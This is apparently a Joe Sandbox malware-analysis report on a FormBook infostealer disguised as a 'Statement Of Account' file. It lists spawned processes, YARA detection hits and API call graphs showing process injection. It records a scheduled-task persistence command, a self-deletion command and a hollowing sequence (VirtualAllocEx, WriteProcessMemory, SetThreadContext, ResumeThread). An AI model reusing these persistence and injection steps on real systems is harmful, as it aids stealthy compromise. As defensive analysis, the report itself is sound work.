                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                          Imagebase:0x1f0000
                                                                                          File size:45'984 bytes
                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:9
                                                                                          Start time:18:43:01
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\explorer.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                          Imagebase:0x7ff72b770000
                                                                                          File size:5'141'208 bytes
                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000009.00000002.2954894231.000000000F91C000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:10
                                                                                          Start time:18:43:03
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                          Imagebase:0x7ff693ab0000
                                                                                          File size:496'640 bytes
                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:11
                                                                                          Start time:18:43:03
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Users\user\AppData\Roaming\SdYCcXyq.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\AppData\Roaming\SdYCcXyq.exe
                                                                                          Imagebase:0x6b0000
                                                                                          File size:791'040 bytes
                                                                                          MD5 hash:DA68E8FF4E0C0D00C613FA9301CF4A37
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 24%, ReversingLabs
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:12
                                                                                          Start time:18:43:04
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmpAA00.tmp"
                                                                                          Imagebase:0x4d0000
                                                                                          File size:187'904 bytes
                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:13
                                                                                          Start time:18:43:04
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:14
                                                                                          Start time:18:43:05
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                          Imagebase:0xab0000
                                                                                          File size:45'984 bytes
                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:15
                                                                                          Start time:18:43:05
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\SysWOW64\cmstp.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\SysWOW64\cmstp.exe"
                                                                                          Imagebase:0xd0000
                                                                                          File size:81'920 bytes
                                                                                          MD5 hash:D7AABFAB5BEFD53BA3A27BD48F3CC675
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Has exited:false

                                                                                          Target ID:16
                                                                                          Start time:18:43:05
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\SysWOW64\colorcpl.exe"
                                                                                          Imagebase:0x860000
                                                                                          File size:86'528 bytes
                                                                                          MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Has exited:true

                                                                                          Target ID:17
                                                                                          Start time:18:43:09
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                          Imagebase:0x240000
                                                                                          File size:236'544 bytes
                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:18
                                                                                          Start time:18:43:09
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true


                                                                                            Execution Graph

                                                                                            Execution Coverage:10.5%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:166
                                                                                            Total number of Limit Nodes:5

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 014AD196
                                                                                            • GetCurrentThread.KERNEL32 ref: 014AD1D3
                                                                                            • GetCurrentProcess.KERNEL32 ref: 014AD210
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 014AD269
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: 70733290f3b6b79bbc6debcc30691fb6b9b1a36882d9885e04b635941195de14
                                                                                            • Instruction ID: 9ee6c41c02a9aabef3d2f19f3158c39dd99eadbfce6c9b812184011795ce66b5
                                                                                            • Opcode Fuzzy Hash: 70733290f3b6b79bbc6debcc30691fb6b9b1a36882d9885e04b635941195de14
                                                                                            • Instruction Fuzzy Hash: 135144B0D002498FDB14DFAAD548BDEBFF1BF88314F24846AE059A7360DB349984CB65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 014AD196
                                                                                            • GetCurrentThread.KERNEL32 ref: 014AD1D3
                                                                                            • GetCurrentProcess.KERNEL32 ref: 014AD210
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 014AD269
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: 463cd38d1572e0e01d84211b369b4e25ea3ef283544dd0dfafdf5955d32e174a
                                                                                            • Instruction ID: 5277c8114009088976ad93a01c591b9951682d335224bcd6eeae6f96f9e1a805
                                                                                            • Opcode Fuzzy Hash: 463cd38d1572e0e01d84211b369b4e25ea3ef283544dd0dfafdf5955d32e174a
                                                                                            • Instruction Fuzzy Hash: 8E5124B0D002499FDB14DFAAD548B9EBBF1BB88314F20845AE459A7360DB34A984CB65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07A2C84E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0
                                                                                            • Opcode ID: 389c69e7b2261ac7028d6d32f8a52785a79329a83ddf38eb69efd239c6f9b8c9
                                                                                            • Instruction ID: 322438e9fe6ccefd3f6201cd7261617b616841c613de2737d4fd038b932a0f82
                                                                                            • Opcode Fuzzy Hash: 389c69e7b2261ac7028d6d32f8a52785a79329a83ddf38eb69efd239c6f9b8c9
                                                                                            • Instruction Fuzzy Hash: 5AA181B1D0022ADFDB14DF68CC407DDBBB2BF44310F1481AAE859A7250DB749986DFA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07A2C84E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0
                                                                                            • Opcode ID: 7dd8d3eff03ecddca8d86b4ca967ad7572912167f72a6d97a16b6ae66ebb807b
                                                                                            • Instruction ID: c9372da22d43079bf97b7b7f4a34cbb4b1855d8205390596d9bc15b7c7a56f93
                                                                                            • Opcode Fuzzy Hash: 7dd8d3eff03ecddca8d86b4ca967ad7572912167f72a6d97a16b6ae66ebb807b
                                                                                            • Instruction Fuzzy Hash: E59182B1D0022ADFDB10DF69C8407DDBBB1BF44314F1481AAE859A7250DB749986DFA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 014AB0E6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 681d9950e28a485abe21639ff030f6f0d690000cce415b46ddcc504109432c43
                                                                                            • Instruction ID: 8a36b89bacff1115b46e40803ccbad2f2caba1956e3bdcf8e5be059a28efd178
                                                                                            • Opcode Fuzzy Hash: 681d9950e28a485abe21639ff030f6f0d690000cce415b46ddcc504109432c43
                                                                                            • Instruction Fuzzy Hash: 137145B0A00B058FD728DF2AC15075ABBF5FF58204F50892EE08AD7B60DB75E849CB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                             Control-flow Graph (textual form; nodes as id address-range, edges as src->dst): 668 14a590c-14a5914 669 14a591c-14a59d9 CreateActCtxA 668->669 671 14a59db-14a59e1 669->671 672 14a59e2-14a5a3c 669->672 671->672 679 14a5a4b-14a5a4f 672->679 680 14a5a3e-14a5a41 672->680 681 14a5a60 679->681 682 14a5a51-14a5a5d 679->682 680->679 684 14a5a61 681->684 682->681 684->684
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 014A59C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                             Control-flow Graph (textual form; nodes as id address-range, edges as src->dst): 685 14a449c-14a59d9 CreateActCtxA 688 14a59db-14a59e1 685->688 689 14a59e2-14a5a3c 685->689 688->689 696 14a5a4b-14a5a4f 689->696 697 14a5a3e-14a5a41 689->697 698 14a5a60 696->698 699 14a5a51-14a5a5d 696->699 697->696 701 14a5a61 698->701 699->698 701->701
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 014A59C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                             Control-flow Graph (textual form; nodes as id address-range, edges as src->dst): 702 14ad421-14ad428 703 14ad42a-14ad54e 702->703 704 14ad3e4-14ad3f4 DuplicateHandle 702->704 705 14ad3fd-14ad41a 704->705 706 14ad3f6-14ad3fc 704->706 706->705
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014AD3E7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                             Control-flow Graph (textual form; nodes as id address-range, edges as src->dst): 719 14aa8b8-14aa8c0 721 14aa8ec 719->721 722 14aa8c2-14ab348 719->722 724 14aa8ee-14aa920 721->724 725 14aa94c-14aa9b4 721->725 726 14ab34a-14ab34d 722->726 727 14ab350-14ab37f LoadLibraryExW 722->727 726->727 730 14ab388-14ab3a5 727->730 731 14ab381-14ab387 727->731 731->730
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,014AB161,00000800,00000000,00000000), ref: 014AB372
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                             Control-flow Graph (textual form; nodes as id address-range, edges as src->dst): 735 7a2c38c-7a2c3de 737 7a2c3e0-7a2c3ec 735->737 738 7a2c3ee-7a2c42d WriteProcessMemory 735->738 737->738 740 7a2c436-7a2c466 738->740 741 7a2c42f-7a2c435 738->741 741->740
                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07A2C420
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07A2C420
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014AD3E7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07A2C500
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07A2C500
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A2BE3E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A2BE3E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014AD3E7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,014AB161,00000800,00000000,00000000), ref: 014AB372
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,014AB161,00000800,00000000,00000000), ref: 014AB372
Memory Dump Source
• Source File: 00000000.00000002.1701338396.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14a0000_Statement Of Account.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07A2C33E
Memory Dump Source
• Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07A2C33E
Memory Dump Source
• Source File: 00000000.00000002.1717312054.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a20000_Statement Of Account.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• ResumeThread.KERNEL32(EC8B5505), ref: 07A2BD72
Memory Dump Source
